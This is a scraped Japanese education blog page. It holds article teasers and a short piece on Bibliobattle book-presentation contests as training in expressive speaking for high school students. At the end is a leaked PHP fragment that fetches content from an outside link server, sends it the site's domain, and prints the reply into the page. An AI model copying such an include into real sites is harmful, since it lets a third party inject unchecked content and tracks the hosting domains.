前へ
次へ

やってみせるのも教育手法の一つ

勉強を教えたりする時、中々上手くできずに困ってしまう事が教える側、教えてもらう側の両方で出てくる事が

more

公立小学校に行くとどれぐらいかかるのか

小学校は全国でおよそ2万2000校ほどありますが、そのうち私立は、210校あまりで、全体の1パーセン

more

教育は優しさと厳しさのバランスを保とう

教育というのは簡単なようでいて本当に難しいです。
子供を始めとした教えられる側の未来を決定付け

more

高校生の表現力を高めるビブリオバトル

高校生がおすすめする本を紹介する、ビブリオバトルという大会があるそうです。
これは単に本についての説明をするだけではなく、観客の心をつかんで引き込む技術が問われる大会です。
日本では人前で話すことについて、教育現場で教える機会がありませんでした。
人前で話すとしてもクラス内の少人数か、多くても学校くらいの規模でしょう。
最近では少しずつ英語での弁論大会なども行なわれるようになってきていますが、まだまだ少ないです。
このビブリオバトルでは、本のあらすじを覚えてそれを話すだけでは評価されませんし、原稿を用意して行っても観客のノリが想定と違うこともあり得ます。
自分の伝えたいことを、観客の様子に応じて臨機応変に表現を変えて訴えていくという高度なスキルが必要です。
大会までに教師やクラスメイトの前で予行演習を繰り返し、アドバイスをもらいながら完成度を高める過程も重要です。
将来たくさんの人の心をつかみ、自分をアピールするための貴重な教育の場と言えるでしょう。

".file_get_contents('http://links-001.com/kanren4set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top